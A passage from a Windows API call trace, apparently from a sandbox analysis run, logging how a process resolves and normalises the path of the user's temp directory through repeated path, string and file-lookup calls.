lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.519] GetThreadLocale () returned 0x409 [0171.519] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="c:\\windows\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.519] GetFullPathNameW (in: lpFileName="c:\\windows\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="c:\\windows\\", lpFilePart=0x28fa90*=0x0) returned 0xb [0171.519] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\windows\\", psz="c:\\windows\\", len=0xb | out: pbstr=0x28fda8*="c:\\windows\\") returned 1 [0171.519] SysReAllocStringLen (in: pbstr=0x28fcc0*=0x0, psz="c:\\windows\\", len=0xb | out: pbstr=0x28fcc0*="c:\\windows\\") returned 1 [0171.519] CharLowerBuffW (in: lpsz="c:\\windows\\", cchLength=0xb | out: lpsz="c:\\windows\\") returned 0xb [0171.519] SysReAllocStringLen (in: pbstr=0x28fda8*="c:\\windows\\", psz="c:\\windows\\", len=0xb | out: pbstr=0x28fda8*="c:\\windows\\") returned 1 [0171.519] SysReAllocStringLen (in: pbstr=0x33e25b8*="c:\\windows\\", psz="c:\\windows\\", len=0xb | out: pbstr=0x33e25b8*="c:\\windows\\") returned 1 [0171.519] GetTempPathW (in: nBufferLength=0xfffe, lpBuffer=0x33f1c98 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25 [0171.520] SysReAllocStringLen (in: pbstr=0x28fd9c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fd9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0171.520] SysReAllocStringLen (in: pbstr=0x28fda0*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0171.520] GetThreadLocale () returned 0x409 [0171.520] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\\\?\\", cchCount2=4) returned 3 [0171.520] GetThreadLocale () returned 0x409 [0171.520] CompareStringW (Locale=0x409, dwCmpFlags=0x1, lpString1="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchCount1=4, lpString2="\\??\\", cchCount2=4) returned 3 [0171.520] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", nBufferLength=0x104, lpBuffer=0x28fa94, lpFilePart=0x28fa90 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpFilePart=0x28fa90*=0x0) returned 0x25 [0171.520] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0171.520] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", nBufferLength=0x104, lpBuffer=0x28f7dc, lpFilePart=0x28f7d8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", lpFilePart=0x28f7d8*=0x0) returned 0x25 [0171.521] SysReAllocStringLen (in: pbstr=0x28fa1c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28fa1c*="C:") returned 1 [0171.521] SysReAllocStringLen (in: pbstr=0x28f9d8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f9d8*="C:\\") returned 1 [0171.521] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0171.521] SysReAllocStringLen (in: pbstr=0x28f9d4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28f9d4*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0171.521] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", cchLength=0x25 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\temp\\") returned 0x25 [0171.521] SetLastError (dwErrCode=0x0) [0171.522] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\temp\\", cchCount1=37, lpString2="c:\\", cchCount2=3) returned 3 [0171.522] GetLastError () returned 0x0 [0171.522] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x28fa60, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0x10ebc1c, ftLastWriteTime.dwHighDateTime=0x28fa78, nFileSizeHigh=0x775d4628, nFileSizeLow=0x10ebc1c, dwReserved0=0x28fa94, dwReserved1=0x4a, cFileName="뽜Tﳘ(P", cAlternateFileName="ꞌĎ발ĎJ")) returned 0xffffffff [0171.528] GetLastError () returned 0x2 [0171.528] SysReAllocStringLen (in: pbstr=0x28fa14*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fa14*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0171.528] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", len=0x24 | out: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp") returned 1 [0171.528] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x28f524, lpFilePart=0x28f520 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpFilePart=0x28f520*="Temp") returned 0x24 [0171.529] SysReAllocStringLen (in: pbstr=0x28f764*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f764*="C:") returned 1 [0171.529] SysReAllocStringLen (in: pbstr=0x28f720*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f720*="C:\\") returned 1 [0171.529] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0171.529] SysReAllocStringLen (in: pbstr=0x28f71c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f71c*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0171.529] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\") returned 0x20 [0171.529] SetLastError (dwErrCode=0x0) [0171.530] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0171.530] GetLastError () returned 0x0 [0171.530] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x28f7a8, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0x10ebc74, ftLastWriteTime.dwHighDateTime=0x28f7c0, nFileSizeHigh=0x775d4628, nFileSizeLow=0x10ebc74, dwReserved0=0x28f7dc, dwReserved1=0x4a, cFileName="ꞌĎﳔ(\x0b", cAlternateFileName="볌Ď뵼ĎH")) returned 0xffffffff [0171.530] GetLastError () returned 0x2 [0171.530] SysReAllocStringLen (in: pbstr=0x28f75c*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f75c*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0171.531] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local", len=0x1f | out: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local") returned 1 [0171.531] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local", nBufferLength=0x104, lpBuffer=0x28f26c, lpFilePart=0x28f268 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local", lpFilePart=0x28f268*="Local") returned 0x1f [0171.531] SysReAllocStringLen (in: pbstr=0x28f4ac*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f4ac*="C:") returned 1 [0171.532] SysReAllocStringLen (in: pbstr=0x28f468*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f468*="C:\\") returned 1 [0171.532] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0171.532] SysReAllocStringLen (in: pbstr=0x28f464*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f464*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0171.532] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\", cchLength=0x1a | out: lpsz="c:\\users\\keecfm~1\\appdata\\") returned 0x1a [0171.532] SetLastError (dwErrCode=0x0) [0171.532] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\", cchCount1=26, lpString2="c:\\", cchCount2=3) returned 3 [0171.532] GetLastError () returned 0x0 [0171.532] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x28f4e8, ftCreationTime.dwLowDateTime=0x775d43cd, ftCreationTime.dwHighDateTime=0x48, ftLastAccessTime.dwLowDateTime=0x15, ftLastAccessTime.dwHighDateTime=0x48, ftLastWriteTime.dwLowDateTime=0x10ebd24, ftLastWriteTime.dwHighDateTime=0x28f508, nFileSizeHigh=0x775d4628, nFileSizeLow=0x10ebd24, dwReserved0=0x28f524, dwReserved1=0x48, cFileName="볌Ď塚(\x0b", cAlternateFileName="뷔Ď뺄Ď>")) returned 0xffffffff [0171.532] GetLastError () returned 0x2 [0171.533] SysReAllocStringLen (in: pbstr=0x28f4a4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\", len=0x1a | out: pbstr=0x28f4a4*="C:\\Users\\KEECFM~1\\AppData\\") returned 1 [0171.533] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData\\", psz="C:\\Users\\KEECFM~1\\AppData", len=0x19 | out: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData") returned 1 [0171.533] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData", nBufferLength=0x104, lpBuffer=0x28efb4, lpFilePart=0x28efb0 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData", lpFilePart=0x28efb0*="AppData") returned 0x19 [0171.533] SysReAllocStringLen (in: pbstr=0x28f1f4*=0x0, psz="C:", len=0x2 | out: pbstr=0x28f1f4*="C:") returned 1 [0171.534] SysReAllocStringLen (in: pbstr=0x28f1b0*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f1b0*="C:\\") returned 1 [0171.534] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0171.534] SysReAllocStringLen (in: pbstr=0x28f1ac*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f1ac*="C:\\Users\\KEECFM~1\\") returned 1 [0171.534] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\", cchLength=0x12 | out: lpsz="c:\\users\\keecfm~1\\") returned 0x12 [0171.534] SetLastError (dwErrCode=0x0) [0171.534] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\", cchCount1=18, lpString2="c:\\", cchCount2=3) returned 3 [0171.534] GetLastError () returned 0x0 [0171.534] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x28f3a4, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1cffa3e, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x10d0000, nFileSizeHigh=0x40, nFileSizeLow=0x10e67c8, dwReserved0=0x400, dwReserved1=0x10ebed2, cFileName="뻐Ď耀\x07疈č", cAlternateFileName="梬Ď桤Ď2")) returned 0xffffffff [0171.535] GetLastError () returned 0x2 [0171.535] SysReAllocStringLen (in: pbstr=0x28f1ec*=0x0, psz="C:\\Users\\KEECFM~1\\", len=0x12 | out: pbstr=0x28f1ec*="C:\\Users\\KEECFM~1\\") returned 1 [0171.535] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\KEECFM~1\\", psz="C:\\Users\\KEECFM~1", len=0x11 | out: pbstr=0x28f474*="C:\\Users\\KEECFM~1") returned 1 [0171.535] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1", nBufferLength=0x104, lpBuffer=0x28ecfc, lpFilePart=0x28ecf8 | out: lpBuffer="C:\\Users\\KEECFM~1", lpFilePart=0x28ecf8*="KEECFM~1") returned 0x11 [0171.536] SysReAllocStringLen (in: pbstr=0x28ef3c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ef3c*="C:") returned 1 [0171.536] SysReAllocStringLen (in: pbstr=0x28eef8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28eef8*="C:\\") returned 1 [0171.536] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0171.536] SysReAllocStringLen (in: pbstr=0x28eef4*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28eef4*="C:\\Users\\") returned 1 [0171.536] CharLowerBuffW (in: lpsz="C:\\Users\\", cchLength=0x9 | out: lpsz="c:\\users\\") returned 0x9 [0171.536] SetLastError (dwErrCode=0x0) [0171.536] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\", cchCount1=9, lpString2="c:\\", cchCount2=3) returned 3 [0171.536] GetLastError () returned 0x0 [0171.536] FindFirstFileW (in: lpFileName="C:\\Users\\" (normalized: "c:\\users"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x28f0ec, ftCreationTime.dwLowDateTime=0x77ad1ecd, ftCreationTime.dwHighDateTime=0x1cffa3e, ftLastAccessTime.dwLowDateTime=0xfffffffe, ftLastAccessTime.dwHighDateTime=0x77a8e36c, ftLastWriteTime.dwLowDateTime=0x77a8e0d2, ftLastWriteTime.dwHighDateTime=0x10d0000, nFileSizeHigh=0x30, nFileSizeLow=0x10eb360, dwReserved0=0x28efb4, dwReserved1=0x32, cFileName="梬Ď(@", cAlternateFileName="닄Ď댴Ď\"")) returned 0xffffffff [0171.537] GetLastError () returned 0x2 [0171.537] SysReAllocStringLen (in: pbstr=0x28ef34*=0x0, psz="C:\\Users\\", len=0x9 | out: pbstr=0x28ef34*="C:\\Users\\") returned 1 [0171.537] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users\\", psz="C:\\Users", len=0x8 | out: pbstr=0x28f1bc*="C:\\Users") returned 1 [0171.537] GetFullPathNameW (in: lpFileName="C:\\Users", nBufferLength=0x104, lpBuffer=0x28ea44, lpFilePart=0x28ea40 | out: lpBuffer="C:\\Users", lpFilePart=0x28ea40*="Users") returned 0x8 [0171.547] SysReAllocStringLen (in: pbstr=0x28ec84*=0x0, psz="C:", len=0x2 | out: pbstr=0x28ec84*="C:") returned 1 [0171.547] SysReAllocStringLen (in: pbstr=0x28ec40*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28ec40*="C:\\") returned 1 [0171.547] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0171.547] SysReAllocStringLen (in: pbstr=0x28ec3c*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28ec3c*="C:\\") returned 1 [0171.547] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0171.547] SetLastError (dwErrCode=0x0) [0171.547] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\", cchCount1=3, lpString2="c:\\", cchCount2=3) returned 2 [0171.547] GetLastError () returned 0x0 [0171.548] FindFirstFileW (in: lpFileName="C:\\Users" (normalized: "c:\\users"), lpFindFileData=0x28eca8 | out: lpFindFileData=0x28eca8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x791634f0, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x791634f0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28ecfc, dwReserved1=0x22, cFileName="Users", cAlternateFileName="")) returned 0x10ec2d8 [0171.548] FileTimeToLocalFileTime (in: lpFileTime=0x28ecbc, lpLocalFileTime=0x28ec38 | out: lpLocalFileTime=0x28ec38) returned 1 [0171.548] FileTimeToDosDateTime (in: lpFileTime=0x28ec38, lpFatDate=0x28ec8a, lpFatTime=0x28ec88 | out: lpFatDate=0x28ec8a, lpFatTime=0x28ec88) returned 1 [0171.549] FindClose (in: hFindFile=0x10ec2d8 | out: hFindFile=0x10ec2d8) returned 1 [0171.549] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users", psz="C:\\Users", len=0x8 | out: pbstr=0x28f1bc*="C:\\Users") returned 1 [0171.549] SysReAllocStringLen (in: pbstr=0x28ef2c*=0x0, psz="C:\\Users", len=0x8 | out: pbstr=0x28ef2c*="C:\\Users") returned 1 [0171.550] SysReAllocStringLen (in: pbstr=0x28f1bc*="C:\\Users", psz="C:\\Users\\", len=0x9 | out: pbstr=0x28f1bc*="C:\\Users\\") returned 1 [0171.550] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1" (normalized: "c:\\users\\keecfmwgj"), lpFindFileData=0x28ef60 | out: lpFindFileData=0x28ef60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x791634f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf29f86d0, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf29f86d0, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28efb4, dwReserved1=0x32, cFileName="kEecfMwgj", cAlternateFileName="KEECFM~1")) returned 0x10ec2d8 [0171.550] FileTimeToLocalFileTime (in: lpFileTime=0x28ef74, lpLocalFileTime=0x28eef0 | out: lpLocalFileTime=0x28eef0) returned 1 [0171.550] FileTimeToDosDateTime (in: lpFileTime=0x28eef0, lpFatDate=0x28ef42, lpFatTime=0x28ef40 | out: lpFatDate=0x28ef42, lpFatTime=0x28ef40) returned 1 [0171.550] FindClose (in: hFindFile=0x10ec2d8 | out: hFindFile=0x10ec2d8) returned 1 [0171.551] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\KEECFM~1", psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f474*="C:\\Users\\kEecfMwgj") returned 1 [0171.551] SysReAllocStringLen (in: pbstr=0x28f1e4*=0x0, psz="C:\\Users\\kEecfMwgj", len=0x12 | out: pbstr=0x28f1e4*="C:\\Users\\kEecfMwgj") returned 1 [0171.552] SysReAllocStringLen (in: pbstr=0x28f474*="C:\\Users\\kEecfMwgj", psz="C:\\Users\\kEecfMwgj\\", len=0x13 | out: pbstr=0x28f474*="C:\\Users\\kEecfMwgj\\") returned 1 [0171.552] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData" (normalized: "c:\\users\\keecfmwgj\\appdata"), lpFindFileData=0x28f218 | out: lpFindFileData=0x28f218*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x794f55f0, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x79698510, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0xe9bbeade, ftLastWriteTime.dwHighDateTime=0x1cb8926, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x400, dwReserved1=0x10ebed2, cFileName="AppData", cAlternateFileName="")) returned 0x10ec2d8 [0171.552] FileTimeToLocalFileTime (in: lpFileTime=0x28f22c, lpLocalFileTime=0x28f1a8 | out: lpLocalFileTime=0x28f1a8) returned 1 [0171.552] FileTimeToDosDateTime (in: lpFileTime=0x28f1a8, lpFatDate=0x28f1fa, lpFatTime=0x28f1f8 | out: lpFatDate=0x28f1fa, lpFatTime=0x28f1f8) returned 1 [0171.552] FindClose (in: hFindFile=0x10ec2d8 | out: hFindFile=0x10ec2d8) returned 1 [0171.553] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\KEECFM~1\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0171.553] SysReAllocStringLen (in: pbstr=0x28f49c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData", len=0x1a | out: pbstr=0x28f49c*="C:\\Users\\kEecfMwgj\\AppData") returned 1 [0171.558] SysReAllocStringLen (in: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData", psz="C:\\Users\\kEecfMwgj\\AppData\\", len=0x1b | out: pbstr=0x28f72c*="C:\\Users\\kEecfMwgj\\AppData\\") returned 1 [0171.558] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28f4d0 | out: lpFindFileData=0x28f4d0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xe31a0b60, ftLastAccessTime.dwHighDateTime=0x1d8a6e8, ftLastWriteTime.dwLowDateTime=0xe31a0b60, ftLastWriteTime.dwHighDateTime=0x1d8a6e8, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f524, dwReserved1=0x48, cFileName="Local", cAlternateFileName="")) returned 0x10ec330 [0171.558] FileTimeToLocalFileTime (in: lpFileTime=0x28f4e4, lpLocalFileTime=0x28f460 | out: lpLocalFileTime=0x28f460) returned 1 [0171.558] FileTimeToDosDateTime (in: lpFileTime=0x28f460, lpFatDate=0x28f4b2, lpFatTime=0x28f4b0 | out: lpFatDate=0x28f4b2, lpFatTime=0x28f4b0) returned 1 [0171.559] FindClose (in: hFindFile=0x10ec330 | out: hFindFile=0x10ec330) returned 1 [0171.559] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\KEECFM~1\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0171.559] SysReAllocStringLen (in: pbstr=0x28f754*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local", len=0x20 | out: pbstr=0x28f754*="C:\\Users\\kEecfMwgj\\AppData\\Local") returned 1 [0171.560] SysReAllocStringLen (in: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\", len=0x21 | out: pbstr=0x28f9e4*="C:\\Users\\kEecfMwgj\\AppData\\Local\\") returned 1 [0171.560] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28f788 | out: lpFindFileData=0x28f788*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x79698510, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0xf38c1580, ftLastAccessTime.dwHighDateTime=0x1da9884, ftLastWriteTime.dwLowDateTime=0xf38c1580, ftLastWriteTime.dwHighDateTime=0x1da9884, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x28f7dc, dwReserved1=0x4a, cFileName="Temp", cAlternateFileName="")) returned 0x10ec330 [0171.560] FileTimeToLocalFileTime (in: lpFileTime=0x28f79c, lpLocalFileTime=0x28f718 | out: lpLocalFileTime=0x28f718) returned 1 [0171.560] FileTimeToDosDateTime (in: lpFileTime=0x28f718, lpFatDate=0x28f76a, lpFatTime=0x28f768 | out: lpFatDate=0x28f76a, lpFatTime=0x28f768) returned 1 [0171.560] FindClose (in: hFindFile=0x10ec330 | out: hFindFile=0x10ec330) returned 1 [0171.561] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0171.561] SysReAllocStringLen (in: pbstr=0x28fa0c*=0x0, psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", len=0x25 | out: pbstr=0x28fa0c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp") returned 1 [0171.561] SysReAllocStringLen (in: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp", psz="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", len=0x26 | out: pbstr=0x28fc9c*="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\") returned 1 [0171.562] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp"), lpFindFileData=0x28fa40 | out: lpFindFileData=0x28fa40*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x50, ftCreationTime.dwHighDateTime=0x28fa60, ftLastAccessTime.dwLowDateTime=0x775d4557, ftLastAccessTime.dwHighDateTime=0x4a, ftLastWriteTime.dwLowDateTime=0x10ebc1c, ftLastWriteTime.dwHighDateTime=0x28fa78, nFileSizeHigh=0x775d4628, nFileSizeLow=0x10ebc1c, dwReserved0=0x28fa94, dwReserved1=0x4a, cFileName="뽜Tﳘ(P", cAlternateFileName="ꞌĎ발ĎJ")) returned 0xffffffff [0171.562] GetLastError () returned 0x2 [0171.562] SysReAllocStringLen (in: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", psz="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\", len=0x25 | out: pbstr=0x28fda0*="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 1 [0171.563] GetFileAttributesW (lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp")) returned 0x2010 [0171.563] GetFullPathNameW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", nBufferLength=0x104, lpBuffer=0x28f7dc, lpFilePart=0x28f7d8 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp", lpFilePart=0x28f7d8*="Temp") returned 0x24 [0171.564] SysReAllocStringLen (in: pbstr=0x28fa1c*=0x0, psz="C:", len=0x2 | out: pbstr=0x28fa1c*="C:") returned 1 [0171.564] SysReAllocStringLen (in: pbstr=0x28f9d8*=0x0, psz="C:\\", len=0x3 | out: pbstr=0x28f9d8*="C:\\") returned 1 [0171.564] CharLowerBuffW (in: lpsz="C:\\", cchLength=0x3 | out: lpsz="c:\\") returned 0x3 [0171.564] SysReAllocStringLen (in: pbstr=0x28f9d4*=0x0, psz="C:\\Users\\KEECFM~1\\AppData\\Local\\", len=0x20 | out: pbstr=0x28f9d4*="C:\\Users\\KEECFM~1\\AppData\\Local\\") returned 1 [0171.564] CharLowerBuffW (in: lpsz="C:\\Users\\KEECFM~1\\AppData\\Local\\", cchLength=0x20 | out: lpsz="c:\\users\\keecfm~1\\appdata\\local\\") returned 0x20 [0171.564] SetLastError (dwErrCode=0x0) [0171.564] CompareStringW (Locale=0x400, dwCmpFlags=0x0, lpString1="c:\\users\\keecfm~1\\appdata\\local\\", cchCount1=32, lpString2="c:\\", cchCount2=3) returned 3 [0171.564] GetLastError () returned 0x0 [0171.564] FindFirstFileW (in: lpFileName="C:\\Users\\KEECFM~1\\AppData\\Local\\" (normalized: "c:\\users\\keecfmwgj\\appdata\\local"), lpFindFileData=0x28fa40 | out: 